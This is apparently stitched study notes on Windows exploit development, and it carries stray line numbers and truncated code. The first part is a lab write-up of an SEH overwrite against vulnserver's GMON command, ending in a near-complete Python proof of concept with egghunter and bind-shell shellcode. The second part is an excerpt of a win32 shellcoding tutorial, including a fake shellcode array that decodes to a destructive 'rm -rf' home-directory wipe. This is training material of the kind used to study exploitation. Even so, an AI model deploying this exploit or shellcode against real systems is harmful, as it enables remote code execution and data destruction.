21 sent = sock.send(payload)
22 print(f"sent {sent} bytes")
When sending the above code, we expect to see 4 B’s in the nSEH field after running !exchain.
Firing up windbg and throwing again confirms that’s what happens.
!exchain
════════
01a1ffc4: 43434343
Now that we know the offset, we’ll determine if there are any bad characters. Here comes
another template!
Update the global variables in GMON\id-bad-chars\exploit.py to look like what’s below. Other
than that, everything is good to go!
6OFFSET = 3514
Note: I initially thought I would need to chunk up the bad character testing to fit within the 52
character limit. However, I noticed that ECX was pointing into the byte array at a point that
was greater than 52 (0x3d or 61). This led me to believe I could send the entire byte array and
check that region of memory for comparison instead of chunking the array.
One nice thing about windbg is how you can manipulate the memory panes to look around
based on offsets. We can use this to find the offset to the memory address of our byte array.
Now that we know the offset, we can compare our byte array to that location to check for bad
characters.
assumes you’ve run !py mona ba -cpb '\x00' to generate the .bin file
══════════════════════════════════════════════════════
═════════════════
Hold on...
- Processing modules
- Comparing 1 location(s)
Boom, we know that our shellcode can make it into memory without getting corrupted!
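The comparison can be approximated outside the debugger as a byte-by-byte check between the array that was sent and a dump of the same region. This is a sketch of the idea; the function name first_mismatch is an assumption and does not correspond to anything in mona.

```python
def first_mismatch(expected: bytes, observed: bytes):
    """Return (index, expected_byte, observed_byte) for the first difference, else None."""
    for i, (e, o) in enumerate(zip(expected, observed)):
        if e != o:
            return i, e, o
    return None


if __name__ == "__main__":
    sent = bytes(range(1, 256))               # every byte except \x00
    dumped = sent.replace(b"\x0a", b"\x20")   # pretend \x0a got mangled in memory
    print(first_mismatch(sent, sent), first_mismatch(sent, dumped))
```

A result of None corresponds to the clean case seen here: the array arrived unmodified, so no additional bad characters were found.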
MONA.PY SEH
The common move for an SEH overwrite is to insert a pop pop ret gadget. We can find
instructions that accomplish that goal very easily with mona’s seh command.
The seh command will search for pointers to routines that will lead to code execution in an
SEH overwrite exploit. By default, it will attempt to bypass SafeSEH by excluding pointers from
rebase, aslr and safeseh protected modules. Output will be written into seh.txt
seh will search for the following instruction gadgets (not just pop pop ret):
The output from seh is shown below (truncated for brevity’s sake).
════════════
Hold on...
---------- Mona command started on 2020-05-18 12:12:23 (v2.0, rev 605) ----------
- Processing modules
[+] Setting pointer access level criteria to 'R', to increase search results
- Folder created
[+] Results :
-------------8<-------------
We can take one of the pop pop ret gadget addresses from the output and plug it into
our GMON\final-poc\exploit.py template. While we’re at it, we can update the global
variables. Also, let’s comment out line 54 (adding shellcode to the payload). We already know
there’s not enough room there for the shellcode as it is.
6OFFSET = 3514
With the pop pop ret gadget in place, we’ll throw the updated script. When we do, we’ll get a
message about an Access violation (shown below)
-------------8<-------------
When this happens, we can enter commands into windbg. We’re going to use the opportunity
to use another awesome mona utility.
MONA.PY BPSEH
For the better part of 3 months, I was running !exchain, copying the nseh record, and then
setting a breakpoint on that address. Little did I know that mona turns it into a single
command. It’s a small thing, but it’s a very nice quality of life touch.
sehbp is an alias of bpseh, or vice-versa. Either way, just type whichever you can remember; it’ll
work!
══════════════
Hold on...
Nr of SEH records : 1
SEH Chain :
-----------
With the breakpoint set, just use the g command and we should hit our pop pop ret.
SHORT JUMP
The next common action in an SEH exploit is to place a short jmp in the nSEH field that hops
over the gadget address stored in the handler field. We’ll stick to convention and hand-jam a
short jump into our PoC.
I don’t want to deep dive on this, there are plenty of great blogs out there that cover SEH
overwrites (this one from @h0mbre is a fine choice!). The TL;DR is that the pop pop ret gadget
executes and redirects execution to the short jump in the nSEH field. The short jump takes us
OVER the gadget address into our nop sled.
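How the jump bytes are derived can be sketched as below. The EB opcode with a signed 8-bit displacement is the standard x86 short jump encoding; the helper names and the two-nop padding are assumptions for illustration and are not taken from the PoC template.

```python
import struct


def short_jmp(displacement: int) -> bytes:
    """Encode `jmp short` (opcode EB) with a signed 8-bit displacement.

    The displacement is relative to the end of the 2-byte instruction.
    """
    if not -128 <= displacement <= 127:
        raise ValueError("displacement does not fit in rel8")
    return b"\xeb" + struct.pack("<b", displacement)


def nseh_jump_over_handler() -> bytes:
    """Fill the 4-byte nSEH field with a jump that lands just past the handler.

    From the start of nSEH to the first byte after the handler is 8 bytes;
    the jump itself is 2 bytes long, so the displacement is 6.
    """
    return short_jmp(6) + b"\x90\x90"


if __name__ == "__main__":
    print(nseh_jump_over_handler().hex())
```

The two trailing nops only pad the field to 4 bytes; they are never executed because the jump is taken first.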
50-------------8<-------------
55-------------8<-------------
After throwing the updated PoC, we can see the disassembly before we take the jump.
MONA.PY EGG
Now we find ourselves within the 52 bytes of space we identified earlier with findmsp. As
already stated, 52 bytes is not enough for our bind shell payload. We’ll need a way to get our
shellcode into memory and then have execution reach that shellcode. Luckily, there’s plenty of
space in the exploit prior to the seh overwrite (3000+ bytes or so). We’ll insert our shellcode
there along with a unique identifier called an egg.
In the 52 bytes of space, we’ll insert a small piece of code called an egghunter. This small piece
of assembly iterates over memory looking for the egg. When found, it transfers execution to
the address immediately following the egg (our shellcode).
You can check out my x64 Linux Egghunter Shellcode post that details what an egghunter is
and how it accomplishes its task. At a high level, the linux and windows version do the same
thing, they just use different syscalls.
At this point, you shouldn’t be surprised to learn that mona can help with crafting an
egghunter as well. mona’s egg command creates an egghunter routine. If you don’t specify a
file containing shellcode, it will simply produce a regular egghunter routine. By default the tag
(egg) used is w00t, though I’ve chosen to use c0d3.
I’ve run into trouble with the very similar tag W00T. What was happening is that
the T translated to a push esp and the W turned into a push edi. These instructions were
jacking up my shellcode, so I devised my own benign tag for use with egghunters.
The tag c0d3’s disassembly is shown below.
ndisasm> 65643063
═════════════════
65 gs
64 fs
30 db 0x30
63 db 0x63
════════════════════
Hold on...
- Folder created
"\x90\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
"\x74\xef\xb8\x63\x30\x64\x33\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff"
"\xe7"
With that done, we’ll need to alter our PoC and add the egghunter.
47-------------8<-------------
48shellcode += b"\xef\x33\xf1"
49
52
53payload = VULNSRVR_CMD
54-------------8<-------------
FINAL POC
Next, we’ll add our egg to the payload. We’ll also include a little wiggle room between the start
of the buffer and the egg. In the same breath, we’ll add our existing shellcode to the payload.
Based on how the egghunter works, the egg needs to be doubled; c0d3 is added as c0d3c0d3.
52-------------8<-------------
53payload = VULNSRVR_CMD
55payload += b"c0d3c0d3"
56payload += shellcode
57-------------8<-------------
After adding in the shellcode variable, we can make sure our payload is of a proper length by
filling the remainder with B’s.
55-------------8<-------------
56payload += shellcode
60-------------8<-------------
Lastly, let’s change our SLED_LENGTH from 20 to 10. This will ensure we have enough room for
our egghunter in the 52 bytes of allowed space.
5-------------8<-------------
6OFFSET = 3514
7SLED_LENGTH = 10
8-------------8<-------------
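The space budget behind this change is easy to check. The sketch below uses the egghunter bytes printed by mona earlier and the 52-byte figure from findmsp; it assumes the nop sled and the egghunter are the only things placed in that space, and the helper name fits is made up.

```python
# Egghunter bytes as printed by mona above (tag c0d3).
EGGHUNTER = (
    b"\x90\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
    b"\x74\xef\xb8\x63\x30\x64\x33\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff"
    b"\xe7"
)
SPACE_AFTER_HANDLER = 52  # bytes of cyclic data after the handler, per findmsp


def fits(sled_length: int, hunter: bytes = EGGHUNTER,
         space: int = SPACE_AFTER_HANDLER) -> bool:
    """True when sled + egghunter fit in the space after the handler (assumed layout)."""
    return sled_length + len(hunter) <= space


if __name__ == "__main__":
    print(len(EGGHUNTER), EGGHUNTER[19:23], fits(20), fits(10))
```

A 20-byte sled plus the 33-byte egghunter needs 53 bytes, one more than is available, while a 10-byte sled leaves room to spare.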
1import struct
2import socket
3
6OFFSET = 3514
7SLED_LENGTH = 10
10
11# shellcode will work in simple cases, likely will need modification
12# -----
15shellcode = b""
16shellcode += b"\xbb\xed\x65\x39\x9d\xdb\xdb\xd9\x74\x24\xf4"
17shellcode += b"\x58\x33\xc9\xb1\x53\x31\x58\x12\x83\xc0\x04"
18shellcode += b"\x03\xb5\x6b\xdb\x68\xb9\x9c\x99\x93\x41\x5d"
19shellcode += b"\xfe\x1a\xa4\x6c\x3e\x78\xad\xdf\x8e\x0a\xe3"
20shellcode += b"\xd3\x65\x5e\x17\x67\x0b\x77\x18\xc0\xa6\xa1"
21shellcode += b"\x17\xd1\x9b\x92\x36\x51\xe6\xc6\x98\x68\x29"
22shellcode += b"\x1b\xd9\xad\x54\xd6\x8b\x66\x12\x45\x3b\x02"
23shellcode += b"\x6e\x56\xb0\x58\x7e\xde\x25\x28\x81\xcf\xf8"
24shellcode += b"\x22\xd8\xcf\xfb\xe7\x50\x46\xe3\xe4\x5d\x10"
25shellcode += b"\x98\xdf\x2a\xa3\x48\x2e\xd2\x08\xb5\x9e\x21"
26shellcode += b"\x50\xf2\x19\xda\x27\x0a\x5a\x67\x30\xc9\x20"
27shellcode += b"\xb3\xb5\xc9\x83\x30\x6d\x35\x35\x94\xe8\xbe"
28shellcode += b"\x39\x51\x7e\x98\x5d\x64\x53\x93\x5a\xed\x52"
29shellcode += b"\x73\xeb\xb5\x70\x57\xb7\x6e\x18\xce\x1d\xc0"
30shellcode += b"\x25\x10\xfe\xbd\x83\x5b\x13\xa9\xb9\x06\x7c"
31shellcode += b"\x1e\xf0\xb8\x7c\x08\x83\xcb\x4e\x97\x3f\x43"
32shellcode += b"\xe3\x50\xe6\x94\x04\x4b\x5e\x0a\xfb\x74\x9f"
33shellcode += b"\x03\x38\x20\xcf\x3b\xe9\x49\x84\xbb\x16\x9c"
34shellcode += b"\x31\xb3\xb1\x4f\x24\x3e\x01\x20\xe8\x90\xea"
35shellcode += b"\x2a\xe7\xcf\x0b\x55\x2d\x78\xa3\xa8\xce\xb6"
36shellcode += b"\x0d\x24\x28\xdc\x7d\x60\xe2\x48\xbc\x57\x3b"
37shellcode += b"\xef\xbf\xbd\x13\x87\x88\xd7\xa4\xa8\x08\xf2"
38shellcode += b"\x82\x3e\x83\x11\x17\x5f\x94\x3f\x3f\x08\x03"
39shellcode += b"\xb5\xae\x7b\xb5\xca\xfa\xeb\x56\x58\x61\xeb"
40shellcode += b"\x11\x41\x3e\xbc\x76\xb7\x37\x28\x6b\xee\xe1"
41shellcode += b"\x4e\x76\x76\xc9\xca\xad\x4b\xd4\xd3\x20\xf7"
42shellcode += b"\xf2\xc3\xfc\xf8\xbe\xb7\x50\xaf\x68\x61\x17"
43shellcode += b"\x19\xdb\xdb\xc1\xf6\xb5\x8b\x94\x34\x06\xcd"
44shellcode += b"\x98\x10\xf0\x31\x28\xcd\x45\x4e\x85\x99\x41"
45shellcode += b"\x37\xfb\x39\xad\xe2\xbf\x5a\x4c\x26\xca\xf2"
46shellcode += b"\xc9\xa3\x77\x9f\xe9\x1e\xbb\xa6\x69\xaa\x44"
47shellcode += b"\x5d\x71\xdf\x41\x19\x35\x0c\x38\x32\xd0\x32"
48shellcode += b"\xef\x33\xf1"
49
51egghunter = b"\x90\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x63\x30\x64\x33\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
52
53payload = VULNSRVR_CMD
55payload += b"c0d3c0d3"
56payload += shellcode
61payload += egghunter
66
67 sent = sock.send(payload)
GETTING A SHELL
If all goes well when we throw the code above, we should see a listener on port 12345 open
up.
══════════════════════
C:\Users\vagrant\Downloads\vulnserver-master>
https://epi052.gitlab.io/notes-to-self/blog/2020-05-18-osce-exam-practice-part-three/
https://github.com/killvxk/Windows-Exploit-Development-practice/blob/master/EFSWS-SEH-egghunter-shell.py
https://www.slideshare.net/RodolphoConcurde/from-seh-overwrite-with-egg-hunter-to-get-a-shell-250602117
https://sec4us.com.br/cheatsheet/bufferoverflow-egghunting
Shellcode
http://www.hick.org/code/skape/papers/win32-shellcode.pdf
https://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/
Over the last couple of months, I have written a set of tutorials about building exploits that
target the Windows stack. One of the primary goals of anyone writing an exploit is to modify
the normal execution flow of the application and trigger the application to run arbitrary code…
code that is injected by the attacker and that could allow the attacker to take control of the
computer running the application.
This type of code is often called "shellcode", because one of the most used targets of running
arbitrary code is to allow an attacker to get access to a remote shell / command prompt on the
host, which will allow him/her to take further control of the host.
While this type of shellcode is still used in a lot of cases, tools such as Metasploit have taken
this concept one step further and provide frameworks to make this process easier. Viewing
the desktop, sniffing data from the network, dumping password hashes or using the owned
device to attack hosts deeper into the network, are just some examples of what can be done
with the Metasploit meterpreter payload/console. People are creative, that’s for sure… and
that leads to some really nice stuff.
The reality is that all of this is “just” a variation on what you can do with shellcode. That is,
complex shellcode, staged shellcode, but still shellcode.
Usually, when people are in the process of building an exploit, they tend to try to use some
simple/small shellcode first, just to prove that they can inject code and get it executed. The
most well known and commonly used example is spawning calc.exe or something like
that. Simple code, short, fast and does not require a lot of set up to work. (In fact, every time
Windows calculator pops up on my screen, my wife cheers… even when I launched calc myself
:-) )
In order to get a “pop calc” shellcode specimen, most people tend to use the already available
shellcode generators in Metasploit, or copy ready made code from other exploits on the net…
just because it’s available and it works. (Well, I don’t recommend using shellcode that was
found on the net for obvious reasons). Frankly, there’s nothing wrong with Metasploit. In fact
the payloads available in Metasploit are the result of hard work and dedication, sheer
craftsmanship by a lot of people. These guys deserve all respect and credits for that.
Shellcoding is not just applying techniques, but requires a lot of knowledge, creativity and
skills. It is not hard to write shellcode, but it is truly an art to write good shellcode.
In most cases, the Metasploit (and other publicly available) payloads will be able to fulfill your
needs and should allow you to prove your point – that you can own a machine because of a
vulnerability.
Nevertheless, today we’ll look at how you can write your own shellcode and how to get
around certain restrictions that may stop the execution of your code (null bytes et al).
A lot of papers and books have been written on this subject, and some really excellent
websites are dedicated to the subject. But since I want to make this tutorial series as complete
as possible, I decided to combine some of that information, throw in my 2 cents, and write my
own “introduction to win32 shellcoding”.
I think it is really important for exploit builders to understand what it takes to build good
shellcode. The goal is not to tell people to write their own shellcode, but rather to understand
how shellcode works (knowledge that may come in handy if you need to figure out why certain
shellcode does not work), and to write their own if there is a specific need for certain
shellcode functionality, or modify existing shellcode if required.
This paper will only cover existing concepts, allowing you to understand what it takes to build
and use custom shellcode… it does not contain any new techniques or new types of shellcode
– but I’m sure you don’t mind at this point.
If you want to read other papers about shellcoding, check out the following links :
• Wikipedia
• Skylined
• Phrack
• Skape
• Amenext.com
• Vividmachines.com
• Didier Stevens
• Harmonysecurity
Every shellcode is nothing more than a little application – a series of instructions written by a
human being, designed to do exactly what that developer wanted it to do. It could be
anything, but it is clear that as the actions inside the shellcode become more complex, the
bigger the final shellcode most likely will become. This will present other challenges (such as
making the code fit into the buffer we have at our disposal when writing the exploit, or just
making the shellcode work reliably… We’ll talk about that later on)
When we look at shellcode in the format it is used in an exploit, we only see bytes. We know
that these bytes form assembly/CPU instructions, but what if we wanted to write our own
shellcode… Do we have to master assembly and write these instructions in asm? Well, it helps
a lot. But if you only want to get your own custom code to execute, one time, on a specific
system, then you may be able to do so with limited asm knowledge. I am not a big asm expert
myself, so if I can do it – you can do it for sure.
Writing shellcode for the Windows platform will require us to use the Windows APIs. How
this impacts the development of reliable shellcode (or shellcode that is portable, that works
across different versions/service pack levels of the OS) will be discussed later in this
document.
• Assembler : nasm
• ActiveState Perl (required to run some of the scripts that are used in this tutorial). I am
using Perl 5.8
• Metasploit
• Skylined alpha3, testival, beta3
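• A little C application to test shellcode (shellcodetest.c). Inside main(), a function pointer is pointed at the shellcode array and then called :
char code[] = "paste your shellcode here";
int (*func)();            /* declared inside main() */
func = (int (*)()) code;  /* point func at the shellcode bytes */
(int)(*func)();           /* run the shellcode */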
Install all of these tools first before working your way through this tutorial ! Also, keep in mind
that I wrote this tutorial on XP SP3, so some addresses may be different if you are using a
different version of Windows.
In addition to these tools and scripts, you’ll also need some healthy brains, good common
sense and the ability to read/understand/write some basic perl/C code + Basic knowledge
about assembly.
You can download the scripts that will be used in this tutorial here :
Before looking at how shellcode is built, I think it’s important to show some techniques to test
ready-made shellcode or test your own shellcode while you are building it.
Furthermore, this technique can (and should) be used to see what certain shellcode does
before you run it yourself (which really is a requirement if you want to evaluate shellcode that
was taken from the internet somewhere without breaking your own systems)
Usually, shellcode is presented in opcodes, in an array of bytes that is found for example inside
an exploit script, or generated by Metasploit (or generated yourself – see later)
First, we need to convert these bytes into instructions so we can see what they do.
Example 1 :
Suppose you have found this shellcode on the internet and you want to know what it does
before you run the exploit yourself :
char shellcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
Would you trust this code, just because it says that it will spawn calc.exe ?
Let’s see. Use the following script to write the opcodes to a binary file :
pveWritebin.pl :
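#!/usr/bin/perl
# http://www.corelan.be
# Takes a filename as argument and writes the shellcode bytes to that file
if ($#ARGV ne 0) {
  print " usage: $0 ".chr(34)."output filename".chr(34)."\n";
  exit(0);
}
system("del $ARGV[0]");
my $shellcode="You forgot to paste ".
"your shellcode in the pveWritebin.pl ".
"file";
#open file in binary mode
print "Writing to ".$ARGV[0]."\n";
open(FILE,">$ARGV[0]");
binmode FILE;
print FILE $shellcode;
close(FILE);
print "Wrote ".length($shellcode)." bytes to file\n";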
Paste the shellcode into the perl script and run the script :
#!/usr/bin/perl
# http://www.corelan.be
if ($#ARGV ne 0) {
  print " usage: $0 ".chr(34)."output filename".chr(34)."\n";
  exit(0);
}
system("del $ARGV[0]");
my $shellcode="\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20".
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65".
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
#open file in binary mode
print "Writing to ".$ARGV[0]."\n";
open(FILE,">$ARGV[0]");
binmode FILE;
print FILE $shellcode;
close(FILE);
print "Wrote ".length($shellcode)." bytes to file\n";
Writing to c:\tmp\shellcode.bin
The first thing you should do, even before trying to disassemble the bytes, is look at the
contents of this file. Just looking at the file may already tell you whether this is a
fake exploit or not.
C:\shellcode>type c:\tmp\shellcode.bin
rm -rf ~ /* 2> /dev/null &
C:\shellcode>
=> hmmm – this one may have caused issues. In fact, if you had run the exploit this
shellcode was taken from on a Linux system, you might have blown up your own system. (That
is, if a syscall had called this code and executed it on your system.)
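The same check can be done without writing a file at all. The snippet below is a minimal sketch (Python is used purely for illustration, and the variable names are mine) that decodes the byte array from example 1 as ASCII:

```python
# Bytes copied from the "shellcode" array in example 1.
shellcode = (
    b"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
    b"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
    b"\x76\x2f\x6e\x75\x6c\x6c\x20\x26"
)

# If every byte is printable ASCII, the "shellcode" is probably just text.
is_text = all(0x20 <= b < 0x7F for b in shellcode)
decoded = shellcode.decode("ascii")

print(len(shellcode), "bytes, printable ASCII only:", is_text)
print(decoded)
```

If the bytes turn out to be readable text, as they do here, there is nothing left to disassemble: the "shellcode" is a shell command.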
Alternatively, you can also use the “strings” command in linux (as explained here). Write the
entire shellcode bytes to a file and then run “strings” on it :
Added on feb 26 2010 : Skylined also pointed out that we can use Testival / Beta3 to evaluate
shellcode as well
Beta3 :
BETA3 --decode \x
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
^Z
Testival can be used to actually run the shellcode – which is – of course – dangerous when you
are trying to find out what some obscure shellcode really does…. but it still will be helpful if
you are testing your own shellcode.
Example 2 :
my $shellcode="\x68\x97\x4C\x80\x7C\xB8".
"\x4D\x11\x86\x7C\xFF\xD0";
Writing to c:\tmp\shellcode.bin
C:\shellcode>type c:\tmp\shellcode.bin
hùLÇ|?M?å| ?
C:\shellcode>
You don’t need to run this code to figure out what it will do.
If the exploit is indeed written for Windows XP Pro SP2 then this will happen :
0:001> d 0x7c804c97
Next, 0x7c86114d is moved into eax and a call eax is made. At 0x7c86114d, we find :
0:001> ln 0x7c86114d
Exact matches:
kernel32!WinExec =
If the “Windows XP Pro SP2” indicator is not right, this will happen (example on XP SP3) :
0:001> d 0x7c804c97
0:001> ln 0x7c86114d
(7c86113a) kernel32!NumaVirtualQueryNode+0x13
| (7c861437) kernel32!GetLogicalDriveStringsW
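The 12 bytes of example 2 are short enough to decode by hand. As a rough sketch (not a real disassembler: it only knows the three opcodes that occur in this example, and the function name is mine), the decoding can be written as:

```python
import struct

# Bytes copied from example 2.
shellcode = b"\x68\x97\x4C\x80\x7C\xB8\x4D\x11\x86\x7C\xFF\xD0"

def decode(code: bytes) -> list:
    """Decode only the three opcodes that occur in this example."""
    out, i = [], 0
    while i < len(code):
        if code[i] == 0x68:                    # push imm32
            (imm,) = struct.unpack_from("<I", code, i + 1)
            out.append(f"push 0x{imm:08x}")
            i += 5
        elif code[i] == 0xB8:                  # mov eax,imm32
            (imm,) = struct.unpack_from("<I", code, i + 1)
            out.append(f"mov eax,0x{imm:08x}")
            i += 5
        elif code[i:i + 2] == b"\xff\xd0":     # call eax
            out.append("call eax")
            i += 2
        else:
            raise ValueError(f"unhandled opcode 0x{code[i]:02x} at offset {i}")
    return out

listing = decode(shellcode)
print("\n".join(listing))
```

The two immediates are the hardcoded addresses discussed above; what they point to depends entirely on the Windows version and service pack.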
You can try to simulate the decoder loop by hand, but it will take a long time to do so. You can
also run the code, paying attention to what happens and using breakpoints to block automatic
execution (to avoid disasters).
This technique is not without danger and requires you to stay focused and understand what
the next instruction will do. So I won’t explain the exact steps to do this right now. As you go
through the rest of this tutorial, examples will be given to load shellcode in a debugger and run
it step by step.
• Make sure to put a breakpoint right before the shellcode will be launched, before
running the testshellcode application (you’ll understand what I mean in a few
moments)
• Don’t just run the code. Use F7 (Immunity) to step through each instruction. Every
time you see a call/jmp/… instruction (or anything that would redirect execution
to somewhere else), then try to find out first what the call/jmp/… will do before you
run it.
• If a decoder is used in the shellcode, try to locate the place where the original
shellcode is reproduced (this will be either right after the decoder loop or in another
location referenced by one of the registers). After reproducing the original code,
usually a jump to this code will be made or (in case the original shellcode was
reproduced right after the loop), the code will just get executed when the result of a certain
compare operation changes from what it was during the loop. At that point, do
NOT run the shellcode yet.
• When the original shellcode was reproduced, look at the instructions and try to
simulate what they will do without running the code.
• Be careful and be prepared to wipe/rebuild your system if you get owned anyway :-)
From C to Shellcode
Ok, let’s get really started now. Let’s say we want to build shellcode that displays a
MessageBox with the text “You have been pwned by Corelan”. I know, this may not be very
useful in a real life exploit, but it will show you the basic techniques you need to master before
moving on to writing / modifying more complex shellcode.
To start with, we’ll write the code in C. For the sake of this tutorial, I have decided to use the
lcc-win32 compiler. If you decided to use another compiler then the concepts and final results
should be more or less the same.
Source (corelan1.c) :
#include <windows.h>
int main(int argc, char **argv)
{
MessageBox(NULL,
"You have been pwned by Corelan",
"Corelan",
MB_OK);
}
Note : As you can see, I used lcc-win32. The user32.dll library (required for MessageBox)
appeared to get loaded automatically. If you use another compiler, you may need to add a
LoadLibraryA(“user32.dll”); call to make it work.
Open the executable in the disassembler (IDA Free) (load PE Executable). After the analysis has
been completed, this is what you’ll get :
.text:004012D4 ; =============== S U B R O U T I N E =======================================
.text:004012D4
.text:004012D4
.text:004012EF leave
.text:004012F0 retn
.text:004012F0
.text:004012F0 ; ---------------------------------------------------------------------------
004012EF |. C9 LEAVE
004012F0 \. C3 RETN
Ok, what do we see here ?
1. the push ebp and mov ebp, esp instructions are used as part of the stack set up. We may not
need them in our shellcode because we will be running the shellcode inside an already existing
application, and we’ll assume the stack has been set up correctly already. (This may not be
true and in real life you may need to tweak the registers/stack a bit to make your shellcode
work, but that’s out of scope for now)
2. We push the arguments that will be used onto the stack, in reverse order. The Title
(Caption) (0x004040A0) and MessageBox Text (0x004040A8) are taken from the .data section
of our executable:
3. We call the MessageBoxA Windows API (which sits in user32.dll). This API takes its 4
arguments from the stack. In case you used lcc-win32 and didn’t really wonder why
MessageBox worked : You can see that this function was imported from user32.dll by looking
at the “Imports” section in IDA. This is important. We will talk about this later on.
(Alternatively, look at MSDN – you can find the corresponding Microsoft library at the bottom
of the function structure page)
4. We clean up and exit the application. We’ll talk about this later on.
In fact, we are not that far away from converting this to workable shellcode. If we take the
opcode bytes from the output above, we have our basic shellcode. We only need to change a
couple of things to make it work :
• Change the way the strings (“Corelan” as title and “You have been pwned by Corelan”
as text) are put onto the stack. In our example these strings were taken from the .data
section of our C application. But when we are exploiting another application, we
cannot use the .data section of that particular application (because it will contain
something else). So we need to put the text onto the stack ourselves and pass the
pointers to the text to the MessageBoxA function.
• Find the address of the MessageBoxA API and call it directly. Open user32.dll in IDA
Free and look at the functions. On my XP SP3 box, this function can be found at
0x7E4507EA. This address will (most likely) be different on other versions of the OS, or
even other service pack levels. We’ll talk about how to deal with that later in this
document.
So a CALL to 0x7E4507EA will cause the MessageBoxA function to be launched, assuming that
user32.dll was loaded/mapped in the current process. We’ll just assume it was loaded for now
– we’ll talk about loading it dynamically later on.
Converting asm to shellcode : Pushing strings to the stack & returning pointer to the strings
1. Convert the string to hex.
2. Push the hex onto the stack (in reverse order). Don’t forget the null byte at the end of the
string and make sure everything is 4 byte aligned (so add some spaces if necessary).
The following little script will produce the opcodes that will push a string to the stack
(pvePushString.pl) :
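#!/usr/bin/perl
# http://www.corelan.be
# Takes a string as argument and produces the opcodes
# that push this string onto the stack
if ($#ARGV ne 0) {
  print " usage: $0 ".chr(34)."String to put on stack".chr(34)."\n";
  exit(0);
}
#convert string to bytes
my $strToPush=$ARGV[0];
my $strThisChar="";
my $strThisHex="";
my $cnt=0;
my $bytecnt=0;
my $strHex="";
my $strOpcodes="";
my $strPush="";
print "String length : ".length($strToPush)."\n";
print "Opcodes to push this string onto the stack :\n\n";
while ($cnt < length($strToPush))
{
  $strThisChar=substr($strToPush,$cnt,1);
  $strThisHex="\\x".ascii_to_hex($strThisChar);
  if ($bytecnt < 3)
  {
    $strHex=$strHex.$strThisHex;
    $bytecnt=$bytecnt+1;
  }
  else
  {
    #4 bytes collected : emit one PUSH and prepend it (reverse order)
    $strPush = $strHex.$strThisHex;
    $strPush =~ tr/\\x//d;
    $strHex=chr(34)."\\x68".$strHex.$strThisHex.chr(34).
      " //PUSH 0x".substr($strPush,6,2).substr($strPush,4,2).
      substr($strPush,2,2).substr($strPush,0,2);
    $strOpcodes=$strHex."\n".$strOpcodes;
    $strHex="";
    $bytecnt=0;
  }
  $cnt=$cnt+1;
}
#last line
if (length($strHex) > 0)
{
  #pad with spaces up to 3 bytes; the 4th byte is the null terminator
  while (length($strHex) < 12)
  {
    $strHex=$strHex."\\x20";
  }
  $strPush = $strHex;
  $strPush =~ tr/\\x//d;
  $strHex=chr(34)."\\x68".$strHex."\\x00".chr(34)." //PUSH 0x00".
    substr($strPush,4,2).substr($strPush,2,2).substr($strPush,0,2);
  $strOpcodes=$strHex."\n".$strOpcodes;
}
else
{
  #add line with spaces + null byte (string terminator)
  $strOpcodes=chr(34)."\\x68\\x20\\x20\\x20\\x00".chr(34).
    " //PUSH 0x00202020"."\n".$strOpcodes;
}
print $strOpcodes;
sub ascii_to_hex
{
  (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  return $str;
}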
Example :
C:\shellcode>perl pvePushString.pl
usage: pvePushString.pl "String to put on stack"
String length : 7
String length : 30
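To make the padding and ordering rules concrete, here is a minimal sketch of the same idea in Python. It is an illustration only, not a port of pvePushString.pl: the function names are mine, and it assumes plain ASCII strings.

```python
def push_string(text: str) -> list:
    """Return the PUSH imm32 instructions (opcode 0x68) that place text on the stack."""
    data = text.encode("ascii")
    # Pad with spaces so that, together with the null terminator,
    # the total length is a multiple of 4.
    data += b" " * (3 - len(data) % 4) + b"\x00"
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downwards, so the last chunk is pushed first.
    return [b"\x68" + chunk for chunk in reversed(chunks)]

def as_c_string(instr: bytes) -> str:
    """Format one instruction the way the opcode listings in this tutorial look."""
    return '"' + "".join(f"\\x{b:02x}" for b in instr) + '"'

caption = push_string("Corelan")
message = push_string("You have been pwned by Corelan")
for instr in caption + message:
    print(as_c_string(instr))
```

For "Corelan" this yields two pushes ("lan" plus the null byte first, then "Core"); the 30 character message needs eight pushes, the first of which carries "an", one space of padding and the null byte.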
Just pushing the text to the stack will not be enough. The MessageBoxA function (just like
other Windows API functions) expects a pointer to the text, not the text itself, so we’ll have to
take this into account. The other 2 parameters however (hWnd and uType, the button type) are not
pointers; in our case they are just 0. So we need a different approach for those 2 parameters.
int MessageBox(
HWND hWnd,
LPCTSTR lpText,
LPCTSTR lpCaption,
UINT uType
);
=> hWnd and uType are values taken from the stack, lpText and lpCaption are pointers to
strings.
• put our strings on the stack and save the pointers to each text string in a register. So
after pushing a string to the stack, we will save the current stack position in a register.
We’ll use ebx for storing the pointer to the Caption text, and ecx for the pointer to the
messagebox text. Current stack position = ESP. So a simple mov ebx,esp or mov
ecx,esp will do.
• set one of the registers to 0, so we can push it to the stack where needed (used as
parameter for hWND and Button). Setting a register to 0 is as easy as performing XOR
on itself (xor eax,eax)
• put the zero’s and addresses in the registers (pointing to the strings) on the stack in
the right order, in the right place
• call MessageBox (which will take its 4 parameters from the stack: the two zeros and
the two pointers that were held in the registers)
In addition to that, when we look at the MessageBox function in user32.dll, we see this :
Apparently the parameters are taken from a location referred to by an offset from EBP
(between EBP+8 and EBP+14). And EBP is populated with ESP at 0x7E4507ED. So that means
we need to make sure our 4 parameters are positioned exactly at that location. This means
